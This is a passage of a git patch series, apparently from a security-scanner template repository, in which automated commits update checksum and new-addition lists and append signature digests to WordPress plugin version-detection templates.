-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:b3846329af6b52784226ac763ea6adf7a47827b7 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3804c6730dd1107b7aafbf5b7ead1ff3ae0e7624 -http/technologies/wordpress/plugins/wpforms-lite.yaml:9ad3f91053b68d9611248b0935e154e7718f4fcc -http/technologies/wordpress/plugins/wps-hide-login.yaml:f884fc4da166c76fddc03ff0117fcb3ba1355350 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:3c0d3469d559366b3f1de03f50cdb4d10fba0dd8 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:594e18cebb248432ca3b1059a04a41f96e71146d +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9227,6 +9227,7 @@ http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:053fcb11256eef5a62c09c7c6cb http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:3a975b7bbbfcebf3e5c188bcdd14cd7a3adfbcd2 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb +http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml:b8797fcb0e1cca380cf521add626044a9e5e23b6 http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:863c7dc541872dcf963d4224201ce604030d618f http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:0930098b37e392d1cf4cdb778b74bba6a2376e3e @@ -9489,7 +9490,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8b355329d0af9aa855dcb4393ef3bdf7bcc9489 +templates-checksum.txt:f4d0eed2ac5f1dcc77c413831ba353e9d2f290ed wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 866e1423be490e38e2ea249f01870167acde99f7 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 11:36:06 +0000 Subject: [PATCH 198/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d954810a94..76c75b2240 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml http/cves/2024/CVE-2024-45488.yaml http/cves/2024/CVE-2024-5910.yaml +http/default-logins/zebra/zebra-printer-default-login.yaml http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml From d1f3d57de42de346597e154807d72a3e65dce939 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 11:36:12 +0000 Subject: [PATCH 199/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 67a431e5b5..c94766a830 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4134,6 +4134,7 @@ http/default-logins/xui/xui-default-login.yaml:5660b7501aa89f9905c2658ecb95886bd http/default-logins/xxljob/xxljob-default-login.yaml:3cf8e51b48310ab30bb81c4c361669425f6c98ce http/default-logins/yealink/yealink-default-login.yaml:1c09abc636a37838c637cc287040bde60590b27f http/default-logins/zabbix/zabbix-default-login.yaml:039c6303b088546c9f54e85481d65de7927262e4 +http/default-logins/zebra/zebra-printer-default-login.yaml:b027865ce67e3db759efd35bd0b111eb2918fb90 http/default-logins/zmanda/zmanda-default-login.yaml:8c81afd379909dea4700a9204c4f38a9b2c0df17 http/exposed-panels/3cx-phone-management-panel.yaml:e7a814bb90b5ad57f2e4e643f7a87496a92dad8e http/exposed-panels/3cx-phone-webclient-management-panel.yaml:e0c9fdfc6a9ea4d1daece9ef526d481f672b4a6a @@ -9490,7 +9491,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f4d0eed2ac5f1dcc77c413831ba353e9d2f290ed +templates-checksum.txt:dce15795bb584b42d4892ed4853af511d2ac4562 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 05f67d4808fe63d4807af1e09296445d86b5c392 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 11:36:37 +0000 Subject: [PATCH 200/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/technologies/wordpress/plugins/ad-inserter.yaml | 2 ++ http/technologies/wordpress/plugins/add-to-any.yaml | 2 ++ http/technologies/wordpress/plugins/admin-menu-editor.yaml | 2 ++ http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 2 ++ http/technologies/wordpress/plugins/akismet.yaml | 2 ++ http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 2 ++ .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 2 ++ http/technologies/wordpress/plugins/amp.yaml | 2 ++ http/technologies/wordpress/plugins/antispam-bee.yaml | 2 ++ http/technologies/wordpress/plugins/astra-sites.yaml | 2 ++ http/technologies/wordpress/plugins/autoptimize.yaml | 2 ++ http/technologies/wordpress/plugins/backwpup.yaml | 2 ++ http/technologies/wordpress/plugins/better-search-replace.yaml | 2 ++ http/technologies/wordpress/plugins/better-wp-security.yaml | 2 ++ .../wordpress/plugins/black-studio-tinymce-widget.yaml | 2 ++ http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 2 ++ http/technologies/wordpress/plugins/breeze.yaml | 2 ++ http/technologies/wordpress/plugins/broken-link-checker.yaml | 2 ++ http/technologies/wordpress/plugins/chaty.yaml | 2 ++ .../wordpress/plugins/child-theme-configurator.yaml | 2 ++ http/technologies/wordpress/plugins/classic-editor.yaml | 2 ++ http/technologies/wordpress/plugins/classic-widgets.yaml | 2 ++ .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 2 ++ http/technologies/wordpress/plugins/cmb2.yaml | 2 ++ http/technologies/wordpress/plugins/coblocks.yaml | 2 ++ http/technologies/wordpress/plugins/code-snippets.yaml | 2 ++ http/technologies/wordpress/plugins/coming-soon.yaml | 2 ++ http/technologies/wordpress/plugins/complianz-gdpr.yaml | 2 ++ .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-7.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-law-info.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-notice.yaml | 2 ++ http/technologies/wordpress/plugins/copy-delete-posts.yaml | 2 ++ http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 2 ++ .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 2 ++ http/technologies/wordpress/plugins/custom-css-js.yaml | 2 ++ http/technologies/wordpress/plugins/custom-fonts.yaml | 2 ++ http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 2 ++ http/technologies/wordpress/plugins/disable-comments.yaml | 2 ++ http/technologies/wordpress/plugins/disable-gutenberg.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-page.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-post.yaml | 2 ++ http/technologies/wordpress/plugins/duplicator.yaml | 2 ++ .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 2 ++ http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 2 ++ http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/elementor.yaml | 2 ++ http/technologies/wordpress/plugins/elementskit-lite.yaml | 2 ++ http/technologies/wordpress/plugins/enable-media-replace.yaml | 2 ++ http/technologies/wordpress/plugins/envato-elements.yaml | 2 ++ .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 2 ++ http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 2 ++ http/technologies/wordpress/plugins/extendify.yaml | 2 ++ .../wordpress/plugins/facebook-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/fast-indexing-api.yaml | 2 ++ http/technologies/wordpress/plugins/flamingo.yaml | 2 ++ http/technologies/wordpress/plugins/fluent-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/fluentform.yaml | 2 ++ http/technologies/wordpress/plugins/font-awesome.yaml | 2 ++ .../wordpress/plugins/force-regenerate-thumbnails.yaml | 2 ++ http/technologies/wordpress/plugins/formidable.yaml | 2 ++ http/technologies/wordpress/plugins/forminator.yaml | 2 ++ http/technologies/wordpress/plugins/ga-google-analytics.yaml | 2 ++ http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 2 ++ .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 2 ++ .../wordpress/plugins/google-analytics-for-wordpress.yaml | 2 ++ .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 2 ++ http/technologies/wordpress/plugins/google-site-kit.yaml | 2 ++ .../wordpress/plugins/google-sitemap-generator.yaml | 2 ++ http/technologies/wordpress/plugins/gtranslate.yaml | 2 ++ http/technologies/wordpress/plugins/gutenberg.yaml | 2 ++ http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 2 ++ .../wordpress/plugins/header-footer-code-manager.yaml | 2 ++ .../technologies/wordpress/plugins/header-footer-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/header-footer.yaml | 2 ++ http/technologies/wordpress/plugins/health-check.yaml | 2 ++ http/technologies/wordpress/plugins/hello-dolly.yaml | 2 ++ http/technologies/wordpress/plugins/host-webfonts-local.yaml | 2 ++ http/technologies/wordpress/plugins/hostinger.yaml | 2 ++ http/technologies/wordpress/plugins/image-optimization.yaml | 2 ++ http/technologies/wordpress/plugins/imagify.yaml | 2 ++ .../wordpress/plugins/insert-headers-and-footers.yaml | 2 ++ http/technologies/wordpress/plugins/instagram-feed.yaml | 2 ++ .../wordpress/plugins/intuitive-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack-boost.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack.yaml | 2 ++ http/technologies/wordpress/plugins/kadence-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/kirki.yaml | 2 ++ http/technologies/wordpress/plugins/leadin.yaml | 2 ++ .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 2 ++ http/technologies/wordpress/plugins/limit-login-attempts.yaml | 2 ++ http/technologies/wordpress/plugins/litespeed-cache.yaml | 2 ++ http/technologies/wordpress/plugins/loco-translate.yaml | 2 ++ http/technologies/wordpress/plugins/loginizer.yaml | 2 ++ .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 2 ++ http/technologies/wordpress/plugins/mailpoet.yaml | 2 ++ http/technologies/wordpress/plugins/maintenance.yaml | 2 ++ http/technologies/wordpress/plugins/mainwp-child.yaml | 2 ++ http/technologies/wordpress/plugins/malcare-security.yaml | 2 ++ http/technologies/wordpress/plugins/megamenu.yaml | 2 ++ http/technologies/wordpress/plugins/members.yaml | 2 ++ http/technologies/wordpress/plugins/meta-box.yaml | 2 ++ http/technologies/wordpress/plugins/metform.yaml | 2 ++ http/technologies/wordpress/plugins/ml-slider.yaml | 2 ++ http/technologies/wordpress/plugins/newsletter.yaml | 2 ++ .../wordpress/plugins/nextend-facebook-connect.yaml | 2 ++ http/technologies/wordpress/plugins/nextgen-gallery.yaml | 2 ++ http/technologies/wordpress/plugins/ninja-forms.yaml | 2 ++ http/technologies/wordpress/plugins/ocean-extra.yaml | 2 ++ .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 2 ++ http/technologies/wordpress/plugins/one-click-demo-import.yaml | 2 ++ http/technologies/wordpress/plugins/optinmonster.yaml | 2 ++ http/technologies/wordpress/plugins/otter-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/password-protected.yaml | 2 ++ http/technologies/wordpress/plugins/pdf-embedder.yaml | 2 ++ .../wordpress/plugins/pinterest-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/pixelyoursite.yaml | 2 ++ http/technologies/wordpress/plugins/polylang.yaml | 2 ++ http/technologies/wordpress/plugins/popup-maker.yaml | 2 ++ http/technologies/wordpress/plugins/post-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/post-types-order.yaml | 2 ++ .../wordpress/plugins/premium-addons-for-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/pretty-link.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-captcha.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-ssl.yaml | 2 ++ http/technologies/wordpress/plugins/redirection.yaml | 2 ++ http/technologies/wordpress/plugins/redux-framework.yaml | 2 ++ http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 2 ++ http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 2 ++ http/technologies/wordpress/plugins/safe-svg.yaml | 2 ++ http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 2 ++ http/technologies/wordpress/plugins/sg-cachepress.yaml | 2 ++ http/technologies/wordpress/plugins/sg-security.yaml | 2 ++ http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 2 ++ .../wordpress/plugins/shortpixel-image-optimiser.yaml | 2 ++ .../wordpress/plugins/simple-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/simple-history.yaml | 2 ++ http/technologies/wordpress/plugins/siteguard.yaml | 2 ++ http/technologies/wordpress/plugins/siteorigin-panels.yaml | 2 ++ http/technologies/wordpress/plugins/smart-slider-3.yaml | 2 ++ http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 2 ++ .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 2 ++ .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 2 ++ http/technologies/wordpress/plugins/sucuri-scanner.yaml | 2 ++ http/technologies/wordpress/plugins/svg-support.yaml | 2 ++ http/technologies/wordpress/plugins/tablepress.yaml | 2 ++ http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 2 ++ http/technologies/wordpress/plugins/templately.yaml | 2 ++ http/technologies/wordpress/plugins/the-events-calendar.yaml | 2 ++ http/technologies/wordpress/plugins/tinymce-advanced.yaml | 2 ++ .../wordpress/plugins/translatepress-multilingual.yaml | 2 ++ .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 2 ++ .../technologies/wordpress/plugins/under-construction-page.yaml | 2 ++ http/technologies/wordpress/plugins/updraftplus.yaml | 2 ++ http/technologies/wordpress/plugins/user-role-editor.yaml | 2 ++ http/technologies/wordpress/plugins/w3-total-cache.yaml | 2 ++ .../wordpress/plugins/webp-converter-for-media.yaml | 2 ++ http/technologies/wordpress/plugins/webp-express.yaml | 2 ++ .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 2 ++ .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 2 ++ http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 2 ++ .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 2 ++ .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-payments.yaml | 2 ++ .../wordpress/plugins/woocommerce-paypal-payments.yaml | 2 ++ .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-services.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/wordfence.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-importer.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-seo.yaml | 2 ++ http/technologies/wordpress/plugins/worker.yaml | 2 ++ http/technologies/wordpress/plugins/wp-crontrol.yaml | 2 ++ http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wp-file-manager.yaml | 2 ++ http/technologies/wordpress/plugins/wp-google-maps.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-logging.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 2 ++ http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 2 ++ http/technologies/wordpress/plugins/wp-optimize.yaml | 2 ++ http/technologies/wordpress/plugins/wp-pagenavi.yaml | 2 ++ http/technologies/wordpress/plugins/wp-reset.yaml | 2 ++ .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 2 ++ http/technologies/wordpress/plugins/wp-rollback.yaml | 2 ++ http/technologies/wordpress/plugins/wp-seopress.yaml | 2 ++ http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 2 ++ http/technologies/wordpress/plugins/wp-smushit.yaml | 2 ++ http/technologies/wordpress/plugins/wp-statistics.yaml | 2 ++ http/technologies/wordpress/plugins/wp-super-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 2 ++ http/technologies/wordpress/plugins/wpforms-lite.yaml | 2 ++ http/technologies/wordpress/plugins/wps-hide-login.yaml | 2 ++ http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 2 ++ .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 2 ++ http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml | 2 ++ 200 files changed, 400 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..5716af7283 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207eb2a3f4138ed93b2851c64534eb585150fa30d2dd8ea68a6c78d28548a16335022100f340aa18cb5693abce6dc92893c6bc68894d84c1dc7c53bde207519d7d2fb71a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..618eb0cb5c 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205fe4363eee98da4af10125b571daf8f5ff25817b704b66a2e4f903dbae0e5ea30220644cda50be86e1c4b27c1872d48ce1505c2de6f284126dd405ec43f3baba0d84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..282cb3376f 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203e6f7f749447ee24de1ffc1633821139092fbf3cefa3b290f8d5235ddaf9ca90022036abeed0c509b56e662bc942822e273a636e77d1eb6db603a04baf48406c971d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 1f02455962..a745215b30 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100845aeb1492e46c3a6efe8518b808ac9c30bdd19e61c219a061b2c028963250c70221009f702c1fd9c068fb1a0588fd0915296b5ce79ad2f78c25c775d006df94774c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..8ed7127bdd 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f5d837294ecd22ebb74d8b09ae5bbf212f24b1fa6e7b7e7dcad0db89044a9a04022100bacdcb41f854ad0eebd8ce1305e504ffedaceb95ce2ee689d1f693e04a6bbf28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..d9ce4a17df 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022025c6c0208a0e99957c1846cc8403ca4ab464438c510ac6b16009a5e7e12bce9e022007df79a28750810db17c3a97f9234505d9013655174a8c17066111d3a041273f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..f8ce0d935c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220501abeecb08946208fba6a228afe11fba60a955f6367e83a5e28112b1e9d0048022000863ea752b876e6adf4dbe500644861fbeb0793cd7757c757b0d36418c22d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..da20fad247 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201b82e6c4c223648506dd81495077c77c7e6ba06e035f6515cccec7d0732a180102205f91e01cac2d07e2ace92f6106eda60d76c5ce336c29b5fbaeaa412ba9a8f818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..088edca467 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206617a5c7578f33476732808398205c98fe6ce72cc18c2bf084c85bdf6b7d969902200554ff997a9352d74c72d473740fd96f59d14677533762ce43f9230c09516085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..c97bca4eff 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a15fb994ea26af9051e35a92b2daf47aa383cc8d9d506c14f341be2af308635f0221009a1f31f2a3ad8f44c6801be46a2a2bd353d599b8e5e3f12852a0c34d2e8444fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..e056e2e2bc 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009bf4ffb7c7738c91a820764109cff1231b2abb38495c5fb0829609b16ab46a7902203e143a2354d9d2fd616d419cb1ed3a047b2d1dc11c89d1740e8003934ca58d22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..ec58459c1d 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220592dc6bf9e9838351c914f1cd9f0e0e92a2eea6b9656c4b78aa1b003166cc34202205fbec1fd6327568f36faec12986618ca3a807d77c90fa9cae03151548c17eb04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..7b67751597 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220536eefa216266d99fb5eeb8a57663995a8ee91e115839900993db07bf987c814022016efda6657ae0094c19cbf237f8d59c86238537b1cbca708655c86e27c380b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..79bb0c4ed8 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f17343b40c6e9321ba6a51f238ccf3d242babbf47f3537a57fa40aabaec43993022100e8f60018176ba62a5f5e3cc421344746666953595dff5cd0ff5e57bea315211c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..35252f792a 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022048e4d269f3f360f72a7606ace41ad2956020f32a7bc6f6ebdffc2d5c6076142802210089766b9385f3da89ed21e8440df04d02aef0f207a17dc8986f6972b91b9d9289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..16df9ac056 100644 --- 